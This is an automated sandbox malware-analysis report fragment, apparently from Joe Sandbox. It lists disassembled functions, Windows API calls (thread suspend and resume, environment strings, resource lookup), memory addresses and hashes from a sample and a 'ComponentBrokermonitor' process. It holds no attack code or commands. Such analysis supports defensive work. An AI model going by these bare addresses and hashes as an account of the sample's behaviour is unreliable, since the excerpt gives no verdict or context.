                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E11FE5
                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E11FF6
                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E12006
                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E12014
                                                                                                      • Part of subcall function 00E11FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E0B371,?,?,00000000,?,?,?), ref: 00E1202F
                                                                                                      • Part of subcall function 00E1AC04: SetCurrentDirectoryW.KERNELBASE(?,00E1AE72,C:\Users\user\Desktop,00000000,00E4946A,00000006), ref: 00E1AC08
                                                                                                    • _wcslen.LIBCMT ref: 00E1AE8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                    • String ID: <$C:\Users\user\Desktop
                                                                                                    • API String ID: 521417927-1688363908
                                                                                                    • Opcode ID: 9a2ade512807892ae6d9ebcb3b7c27c52241005d11ef5d4714296917f6b70828
                                                                                                    • Instruction ID: e12af16e4eac8af48d463bc78a30b2e2e159834e4def307792a6b1a400632858
                                                                                                    • Opcode Fuzzy Hash: 9a2ade512807892ae6d9ebcb3b7c27c52241005d11ef5d4714296917f6b70828
                                                                                                    • Instruction Fuzzy Hash: 69017171D00218A9DF10ABA4ED0AEDF73FCAF48304F041465F605F3192E6B8A6C88AA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E297E5: GetLastError.KERNEL32(?,00E41098,00E24674,00E41098,?,?,00E240EF,?,?,00E41098), ref: 00E297E9
                                                                                                      • Part of subcall function 00E297E5: _free.LIBCMT ref: 00E2981C
                                                                                                      • Part of subcall function 00E297E5: SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E2985D
                                                                                                      • Part of subcall function 00E297E5: _abort.LIBCMT ref: 00E29863
                                                                                                    • _abort.LIBCMT ref: 00E2BB80
                                                                                                    • _free.LIBCMT ref: 00E2BBB4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                    • String ID: p
                                                                                                    • API String ID: 289325740-2678736219
                                                                                                    • Opcode ID: d03dab5b9904f03e4728944c9de79de29d7d8bf8f46454ce9d6c88d52bb8f782
                                                                                                    • Instruction ID: 15fdbd44f48bcd791a7b0f14fc037715d593f09df8cdc3609620c4b0c6053161
                                                                                                    • Opcode Fuzzy Hash: d03dab5b9904f03e4728944c9de79de29d7d8bf8f46454ce9d6c88d52bb8f782
                                                                                                    • Instruction Fuzzy Hash: 46019232D01636DFCB21AF6AA80265DBBA1BF04B25B15211AF824B73D5CB756D41CFC1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Malloc
                                                                                                    • String ID: ($Z
                                                                                                    • API String ID: 2696272793-3316338816
                                                                                                    • Opcode ID: 8cedb3d3bb4a960509af9fa69dca698a037d6395a7ac49e1c3f3557846857a34
                                                                                                    • Instruction ID: 98d11867cd1f6b443923dd8534495a3d43d477abf216eaefee471981793c48ee
                                                                                                    • Opcode Fuzzy Hash: 8cedb3d3bb4a960509af9fa69dca698a037d6395a7ac49e1c3f3557846857a34
                                                                                                    • Instruction Fuzzy Hash: A60146B6600108FF9F059FB1EC49CEFBBADEF083947004159F906E7120E671AA48DBA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2BF30: GetEnvironmentStringsW.KERNEL32 ref: 00E2BF39
                                                                                                      • Part of subcall function 00E2BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2BF5C
                                                                                                      • Part of subcall function 00E2BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E2BF82
                                                                                                      • Part of subcall function 00E2BF30: _free.LIBCMT ref: 00E2BF95
                                                                                                      • Part of subcall function 00E2BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E2BFA4
                                                                                                    • _free.LIBCMT ref: 00E282AE
                                                                                                    • _free.LIBCMT ref: 00E282B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                    • String ID: 0"
                                                                                                    • API String ID: 400815659-420201205
                                                                                                    • Opcode ID: 2502261a1989e788efe1c4a516c0c055de73b9a09e5687cc24d29f43af0b0ef6
                                                                                                    • Instruction ID: 0afc1705c8ef5555bbc12df09063c9a7959b18475b1ae8a7e10e7ff1d8de3130
                                                                                                    • Opcode Fuzzy Hash: 2502261a1989e788efe1c4a516c0c055de73b9a09e5687cc24d29f43af0b0ef6
                                                                                                    • Instruction Fuzzy Hash: 7DE02B33A07D7285B261327A3D1276F07844FD1378B15361AF610F70F3CE50880644A2
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00E11101,?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FEA
                                                                                                    • GetLastError.KERNEL32(?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FF6
                                                                                                      • Part of subcall function 00E06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E06C54
                                                                                                    Strings
                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E10FFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                    • Opcode ID: da89ab528a112660aa4da8ebc54c608327891fbebef4170f5643f2b9f7fbcf95
                                                                                                    • Instruction ID: dc8ab3f6befe44e58beda6d49b1a47831620d748bbdcfbcdcb8d41894d7ef842
                                                                                                    • Opcode Fuzzy Hash: da89ab528a112660aa4da8ebc54c608327891fbebef4170f5643f2b9f7fbcf95
                                                                                                    • Instruction Fuzzy Hash: F9D02E729086343ADA203334AC4EEAE7C04CB62332F202744F138712F2CA2449D18A92
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00E0DA55,?), ref: 00E0E2A3
                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E0DA55,?), ref: 00E0E2B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindHandleModuleResource
                                                                                                    • String ID: RTL
                                                                                                    • API String ID: 3537982541-834975271
                                                                                                    • Opcode ID: 7f8dcc8f257a97df049cf181fce90d7e41a91ae534229954ee34e63edd8117e8
                                                                                                    • Instruction ID: 97420e4e9fe3f16cf10fec1ddacb2c503bad6c3a857b4f98121fa470923178af
                                                                                                    • Opcode Fuzzy Hash: 7f8dcc8f257a97df049cf181fce90d7e41a91ae534229954ee34e63edd8117e8
                                                                                                    • Instruction Fuzzy Hash: 58C012316407106AEA3427766D4DF936E585B00B16F091858B281FE6E2DAE5C9C8CAA0
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E467
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: p$z
                                                                                                    • API String ID: 1269201914-1258701225
                                                                                                    • Opcode ID: a7527dc3531a1e2fc736042e7946467f18c3de3c6d42df670cb68d7da6660434
                                                                                                    • Instruction ID: 881fff04b8cd4caeb91863219ad4e9072bd196a6f735cde23d5907a11d56a788
                                                                                                    • Opcode Fuzzy Hash: a7527dc3531a1e2fc736042e7946467f18c3de3c6d42df670cb68d7da6660434
                                                                                                    • Instruction Fuzzy Hash: FFB012E1699141BC314891242C07CB7014CC8C0F90B30B02EFC14F0281D8408CC50532
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E467
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: U$z
                                                                                                    • API String ID: 1269201914-4031037884
                                                                                                    • Opcode ID: 543b5cea78f3528d8018ae521a0c354e75c13747b9a0ae8d75aa4ded011633a4
                                                                                                    • Instruction ID: 6fa0f7d63be4714c285208db3de188063d46742906653ae6059ce71f57f15429
                                                                                                    • Opcode Fuzzy Hash: 543b5cea78f3528d8018ae521a0c354e75c13747b9a0ae8d75aa4ded011633a4
                                                                                                    • Instruction Fuzzy Hash: 52B012F1298100BC310815202D07CB7120CC8C0F50B30F02EFE10F0182D8414EC60432
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CommandLine
                                                                                                    • String ID: `%Z
                                                                                                    • API String ID: 3253501508-3571153471
                                                                                                    • Opcode ID: ca527f6b4ba231e37bb6c4b3101f5c4adbe42022587a3afc21c847f259925088
                                                                                                    • Instruction ID: e2ab3cfd134c80c65730cb7c3094a9f440b870e17ee7a9fc7109b36b2baf15d4
                                                                                                    • Opcode Fuzzy Hash: ca527f6b4ba231e37bb6c4b3101f5c4adbe42022587a3afc21c847f259925088
                                                                                                    • Instruction Fuzzy Hash: FAB092B880260C8FD7008F33F80C4097FB0BB08382380595AD902E6330DB74418DDF00

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:12
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 15843 7ffd9bc6d700 15844 7ffd9bc6d706 ResumeThread 15843->15844 15846 7ffd9bc6d814 15844->15846 15839 7ffd9bc6c00d 15840 7ffd9bc6c01b SuspendThread 15839->15840 15842 7ffd9bc6c0f4 15840->15842 15835 7ffd9bc6d869 15836 7ffd9bc6d877 CloseHandle 15835->15836 15838 7ffd9bc6d954 15836->15838 15847 7ffd9bc6f4c5 15848 7ffd9bc6f4df GetFileAttributesW 15847->15848 15850 7ffd9bc6f5a5 15848->15850

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 289 7ffd9bac0d74-7ffd9bac0d87 290 7ffd9bac0d8a-7ffd9bac0dc9 289->290 291 7ffd9bac0d89 289->291 293 7ffd9bac0dcb 290->293 294 7ffd9bac0dd0-7ffd9bac0e39 call 7ffd9bac07d0 290->294 291->290 293->294 303 7ffd9bac0e3b-7ffd9bac0e6d 294->303 304 7ffd9bac0e70-7ffd9bac0ebb 294->304 303->304 311 7ffd9bac0ebd-7ffd9bac0ed2 304->311 312 7ffd9bac0ed3-7ffd9bac0fb3 304->312 311->312 324 7ffd9bac0fbb-7ffd9bac10ac 312->324
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 562020395e581b84d42c0f8829cc2b13a398dd7e3c1dcc2264f91ac0cb89b74b
                                                                                                    • Instruction ID: 476a45c94336b5a35bd68e0fb202484ca86b1b4f4e9bf9bdb750045385ec6271
                                                                                                    • Opcode Fuzzy Hash: 562020395e581b84d42c0f8829cc2b13a398dd7e3c1dcc2264f91ac0cb89b74b
                                                                                                    • Instruction Fuzzy Hash: B7A1C075A19A4D8FE798EB68C8657A97FE2FF59310F4002BED008D72D6CBB42851CB40

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: e7cbb5f1b363190914ba98ecc1da47637c5e3684573113d4ee264f4afaed8944
                                                                                                    • Instruction ID: 90f67d5c8e1a1e9b79da0208137a1cda50576d256736be2031bfd0bf1d71b5eb
                                                                                                    • Opcode Fuzzy Hash: e7cbb5f1b363190914ba98ecc1da47637c5e3684573113d4ee264f4afaed8944
                                                                                                    • Instruction Fuzzy Hash: 82516B7090D78C8FDB5ADFA8C855AE9BFF0EF16310F1441ABD049DB2A2DA349846CB11

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 12 7ffd9bc6c00d-7ffd9bc6c019 13 7ffd9bc6c024-7ffd9bc6c0f2 SuspendThread 12->13 14 7ffd9bc6c01b-7ffd9bc6c023 12->14 18 7ffd9bc6c0f4 13->18 19 7ffd9bc6c0fa-7ffd9bc6c144 13->19 14->13 18->19
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SuspendThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 3178671153-0
                                                                                                    • Opcode ID: b9739085556d8a02abb2d59a32ae904d0445d897d3dd8f9dd0011372f3032b64
                                                                                                    • Instruction ID: 64dea1f66d4560dbde88a6608508406362270f1e29430e793486d4ba2e61a756
                                                                                                    • Opcode Fuzzy Hash: b9739085556d8a02abb2d59a32ae904d0445d897d3dd8f9dd0011372f3032b64
                                                                                                    • Instruction Fuzzy Hash: 9B416930E0864D8FDB58DFA8C894AEDBBF0FF5A311F10416AD049E7292DA34A885CF40

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 22 7ffd9bc6f4c5-7ffd9bc6f5a3 GetFileAttributesW 26 7ffd9bc6f5ab-7ffd9bc6f5e9 22->26 27 7ffd9bc6f5a5 22->27 27->26
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: f4bc7aafd848fdf4af6f8703edda4b0b7e6333e1bfdf67efa5686d2f35cbe10c
                                                                                                    • Instruction ID: 1348d755b9d8f6a18b64ca13cf9f2b9857663f0f0533bf7822c089978e0d34f6
                                                                                                    • Opcode Fuzzy Hash: f4bc7aafd848fdf4af6f8703edda4b0b7e6333e1bfdf67efa5686d2f35cbe10c
                                                                                                    • Instruction Fuzzy Hash: F1411970E0865C8FDB98DF98D895BEDBBF0EB59310F10416ED009E7252DA719845CF40

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 29 7ffd9bc6d869-7ffd9bc6d875 30 7ffd9bc6d880-7ffd9bc6d952 CloseHandle 29->30 31 7ffd9bc6d877-7ffd9bc6d87f 29->31 35 7ffd9bc6d954 30->35 36 7ffd9bc6d95a-7ffd9bc6d9ae 30->36 31->30 35->36
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: c534d4ba05112b0901a11539edbbff889c61356d457c14299f5cdeb94981200d
                                                                                                    • Instruction ID: 6bb1970cbed07c01a7e770209c4a7c99e4b6a349f467fc58077ac3a24b980bd5
                                                                                                    • Opcode Fuzzy Hash: c534d4ba05112b0901a11539edbbff889c61356d457c14299f5cdeb94981200d
                                                                                                    • Instruction Fuzzy Hash: CA416E30D0864D8FDB58DFA8C894BEDBBF0FF5A310F1041AAD049E7292DA349885CB41

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 449 7ffd9bac08d0-7ffd9bac08d9 451 7ffd9bac0916-7ffd9bac0949 449->451 452 7ffd9bac08db-7ffd9bac08e6 449->452 455 7ffd9bac0986-7ffd9bac098f 451->455 456 7ffd9bac094b-7ffd9bac095f 451->456 452->451
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 56272466beb92ea4d62525f511c7c06dc7fca9f90904eb74968ad199acb474fc
                                                                                                    • Instruction ID: 370de7071b61cf7ef3b5d195c98d680f7bcdec5c07c0b5c1b9853b2e12273c21
                                                                                                    • Opcode Fuzzy Hash: 56272466beb92ea4d62525f511c7c06dc7fca9f90904eb74968ad199acb474fc
                                                                                                    • Instruction Fuzzy Hash: 0951E431A0855D8FDB54FFA8D8A4AFD7BA0EF58329F0402BBE40DD7196CE246481C784

                                                                                                    Control-flow Graph

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7cd83386726c582396df48e1fb916ceb17a7135d515ca27c7806fc0f6f11dd1
                                                                                                    • Instruction ID: 688337b99746ea5213440651d5150c36fb150b0644b64a3b00820bb115bdd3c0
                                                                                                    • Opcode Fuzzy Hash: b7cd83386726c582396df48e1fb916ceb17a7135d515ca27c7806fc0f6f11dd1
                                                                                                    • Instruction Fuzzy Hash: 71411832F0D65D8FD720EB9CD8645FA7BA0EFA6325F0903BBD198871A2ED3525058740
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c742a518d63d464e16a07c2e1bb08118efd72ab5bef50bfdc398f9fa1e5b7de9
                                                                                                    • Instruction ID: f6b0037450b4ea21d00d6d121fdf7ac22983c40432129ce536d4c839fbe02bcc
                                                                                                    • Opcode Fuzzy Hash: c742a518d63d464e16a07c2e1bb08118efd72ab5bef50bfdc398f9fa1e5b7de9
                                                                                                    • Instruction Fuzzy Hash: 0B516D70A0490E9FCF84EF98D494EEDBBF1FF58325B150269E419E7260DA74E990CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ec037ce451dc05f5a4f48c0f4257710295b1eed82a67e05dfa7e862b0f964049
                                                                                                    • Instruction ID: 161d4e2060d35ff9704e7a551b8131c56ed2003ab7c91c7c8a92a5ad0d8f5375
                                                                                                    • Opcode Fuzzy Hash: ec037ce451dc05f5a4f48c0f4257710295b1eed82a67e05dfa7e862b0f964049
                                                                                                    • Instruction Fuzzy Hash: 6C413B70A1490D8FDB94EF98C8A4AEDB7F1FF98311F110169D409E32A5CB34A981CB81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5772485edd8728574d2cef4859ce1419772bfc593c14b7bcdd74c8452ba3e401
                                                                                                    • Instruction ID: d5da7942dbd2fc6394ad10b1020c8324bf2533a17e62709901d4d22198946a61
                                                                                                    • Opcode Fuzzy Hash: 5772485edd8728574d2cef4859ce1419772bfc593c14b7bcdd74c8452ba3e401
                                                                                                    • Instruction Fuzzy Hash: 8041FD30A0891D8FDBA8EB14C865EB977B1EF59315F5002EAD00EE72A5CE746A85CF41
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03641709ad75ed643c164a8608847a65fd41a3587c8c645b4a25209ab7e1c586
                                                                                                    • Instruction ID: af4446ee12aa8e5a468c14a7ce3161875e571e769f079ac0fc9ead64e3eb7729
                                                                                                    • Opcode Fuzzy Hash: 03641709ad75ed643c164a8608847a65fd41a3587c8c645b4a25209ab7e1c586
                                                                                                    • Instruction Fuzzy Hash: 4541EC30A0492D8FDFA8DF18CC54EA9B7B1EB54315F1002EE900EE72A4CE755A85CF41
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cec0750f1b93bbd29e728068d3a70fd7610d7f4e2c32cc3f45b7e10b4935b803
                                                                                                    • Instruction ID: f2ffc9353ef7179b2578bdf93dba1ba870376fe8867a9c7d4896a7351170044a
                                                                                                    • Opcode Fuzzy Hash: cec0750f1b93bbd29e728068d3a70fd7610d7f4e2c32cc3f45b7e10b4935b803
                                                                                                    • Instruction Fuzzy Hash: 4A41C171E4952D8EEBA4EB54C8987BCB7B0EB55300F5041EA904DA72A1DEB82AC1CF05
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: beb5d5e499d24ddf4f87b0acfcbbb8ab9928fd91ab3d18b41e2e24d9ee3254ac
                                                                                                    • Instruction ID: c761ded6bd604901629d4b21a905172ab654acb77506036919d409d10a7106b1
                                                                                                    • Opcode Fuzzy Hash: beb5d5e499d24ddf4f87b0acfcbbb8ab9928fd91ab3d18b41e2e24d9ee3254ac
                                                                                                    • Instruction Fuzzy Hash: 4A210875B0E28D4BE732ABA8CC202FD7760EF52711F0606B7C1549B1E3CA7826058B95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 56347ed0521b8f4e6e31270a7c1cb25e9b3fa74244236cf9713129dee895e6f9
                                                                                                    • Instruction ID: c19f3397b46e4b71677677c1f49feda1f7724135f9d84d370b738b605c52a471
                                                                                                    • Opcode Fuzzy Hash: 56347ed0521b8f4e6e31270a7c1cb25e9b3fa74244236cf9713129dee895e6f9
                                                                                                    • Instruction Fuzzy Hash: DF21C630A1491D8FDB94FBA8C8A8ABDB7F1FF28304B11456AD409D72A1DF74A981CB44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3b42ca3252f4e73343dc8e97565cadd1fb1b62cb128079c8065af24ab7927857
                                                                                                    • Instruction ID: 0e137114d0092c3e973d21d915629fc564c7dfe36bbbf46e3f1610787779ef79
                                                                                                    • Opcode Fuzzy Hash: 3b42ca3252f4e73343dc8e97565cadd1fb1b62cb128079c8065af24ab7927857
